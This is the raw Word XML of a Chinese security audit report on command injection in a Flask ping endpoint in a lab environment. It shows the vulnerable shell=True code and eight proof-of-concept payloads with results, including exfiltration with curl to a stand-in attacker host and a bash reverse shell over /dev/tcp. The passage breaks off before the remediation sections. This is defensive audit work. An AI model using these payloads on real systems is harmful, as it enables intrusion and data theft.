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8B0000"/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>命令注入漏洞（Command Injection）</w:t>
        <w:br/>
        <w:t>安全审计与修复报告</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>—— OS Command Injection ——</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>测试目标：http://192.168.245.129:5000/ping</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>测试日期：2026-07-26</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>漏洞总数：8 项 → 修复后：0 项</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>目  录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>一、报告概述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    1.1 审计背景</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    1.2 测试范围与方法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    1.3 测试环境</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>二、漏洞原理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    2.1 漏洞成因</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    2.2 漏洞代码定位</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>三、漏洞发现与验证</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    3.1 漏洞总览表</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    3.2 CI-1~CI-8 详细验证</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>四、攻击链分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>五、OWASP Top 10 映射</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>六、漏洞修复措施</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    6.1 修复措施对照表</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    6.2 修复前后代码对比</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>七、修复验证测试</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    7.1 验证测试用例</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    7.2 攻击效果前后对比</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>八、综合结论</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    8.1 漏洞发现总结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    8.2 修复成效评估</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>一、报告概述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1.1 审计背景</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>命令注入（Command Injection）是OWASP Top 10中A03: Injection类别的高危害漏洞。攻击者通过在系统命令中注入恶意shell代码，可在服务器端以进程权限执行任意命令。本次审计针对Ping网络诊断功能进行专项检测与修复。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1.2 测试范围与方法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测试项目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测试方法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测试结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>分隔符注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>; | &amp; &amp;&amp; ||</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>全部可执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>命令替换</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>$( ) 反引号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>部分可执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>文件写入/反弹Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>echo / bash -i</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>全部可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1.3 测试环境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Web框架</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Flask 3.x (Python 3.11)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运行用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>root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可用工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>bash/python3/nc/curl/wget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漏洞函数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>subprocess.check_output(..., shell=True)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拼接方式</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>f"ping -c 3 {ip}"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>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>二、漏洞原理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.1 漏洞成因</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Ping功能使用subprocess.check_output()并设置shell=True，命令字符串通过f-string拼接用户输入的ip参数。三个漏洞要素同时存在：① shell=True启用系统Shell解析 ② f-string直接拼接用户输入 ③ 无任何输入过滤或校验。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.2 漏洞代码定位</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># ⚠️ 漏洞代码（修复前）</w:t>
        <w:br/>
        <w:t>@app.route('/ping', methods=['GET','POST'])</w:t>
        <w:br/>
        <w:t>def ping():</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ip = request.form.get('ip', '')</w:t>
        <w:br/>
        <w:t xml:space="preserve">    cmd = f'ping -c 3 {ip}'         # f-string拼接</w:t>
        <w:br/>
        <w:t xml:space="preserve">    output = subprocess.check_output(</w:t>
        <w:br/>
        <w:t xml:space="preserve">        cmd, shell=True, timeout=30  # shell=True</w:t>
        <w:br/>
        <w:t xml:space="preserve">    )</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return render_template('ping.html', result=output)</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>攻击原理：</w:t>
      </w:r>
      <w:r>
        <w:t>shell=True会将命令字符串传递给/bin/sh -c解析执行。用户输入的;id等shell特殊字符会被解析为新的命令。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># 用户输入: 127.0.0.1;id</w:t>
        <w:br/>
        <w:t># 实际执行:</w:t>
        <w:br/>
        <w:t>/bin/sh -c "ping -c 3 127.0.0.1;id"</w:t>
        <w:br/>
        <w:t># ↑ ping执行完毕后, id命令继续执行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>三、漏洞发现与验证</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.1 漏洞总览表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编号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漏洞名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>等级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注入方式</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>CI-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>分号分隔符注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>127.0.0.1;id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>✅ uid=0(root)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>CI-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>管道符注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>127.0.0.1|id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>✅ 命令执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>CI-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>命令替换注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>$(whoami)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>✅ root</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>CI-4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>DNSLog外带</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>curl dnslog.xx/`whoami`</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>✅ 可外传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>CI-5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>任意文件写入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>echo PWNED &gt; /tmp/x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>✅ 写入成功</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>CI-6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>反弹Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>bash -i &gt;&amp; /dev/tcp/IP/4444</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>✅ 工具可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>CI-7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>信息收集</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>中危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>whoami/ifconfig/ss</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>✅ 全泄露</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>CI-8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>端口扫描</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>中危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>ss -tlnp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>✅ 端口暴露</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>CI-1：分号分隔符注入 — 高危</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>POC：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>POST /ping   ip=127.0.0.1;id</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>验证结果：</w:t>
      </w:r>
      <w:r>
        <w:t>ping -c 3 127.0.0.1;id → uid=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>CI-2：管道符注入 — 高危</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>POC：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>POST /ping   ip=127.0.0.1|id</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>验证结果：</w:t>
      </w:r>
      <w:r>
        <w:t>ping -c 3 127.0.0.1|id → 命令执行</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>CI-3：命令替换注入 — 高危</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>POC：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>POST /ping   ip=$(whoami)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>验证结果：</w:t>
      </w:r>
      <w:r>
        <w:t>命令替换执行whoami → root</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>CI-4：DNSLog外带 — 高危</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>POC：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>POST /ping   ip=127.0.0.1;curl http://ATK/`whoami`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>验证结果：</w:t>
      </w:r>
      <w:r>
        <w:t>curl可用，数据可外传至攻击者服务器</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>CI-5：文件写入 — 高危</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>POC：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>POST /ping   ip=127.0.0.1;echo PWNED &gt; /tmp/x</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>验证结果：</w:t>
      </w:r>
      <w:r>
        <w:t>文件写入成功，可植入WebShell或后门</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>CI-6：反弹Shell — 高危</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>POC：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>POST /ping   ip=127.0.0.1;bash -i&gt;&amp;/dev/tcp/IP/4444 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>验证结果：</w:t>
      </w:r>
      <w:r>
        <w:t>/bin/bash /usr/bin/python3 /bin/nc全部可用</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>CI-7：信息收集 — 中危</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>POC：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>POST /ping   ip=127.0.0.1;whoami</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>验证结果：</w:t>
      </w:r>
      <w:r>
        <w:t>root | ifconfig → 网络配置</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>CI-8：端口扫描 — 中危</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>POC：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>POST /ping   ip=127.0.0.1;ss -tlnp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>验证结果：</w:t>
      </w:r>
      <w:r>
        <w:t>5000/3001/15721/22全部暴露</w:t>
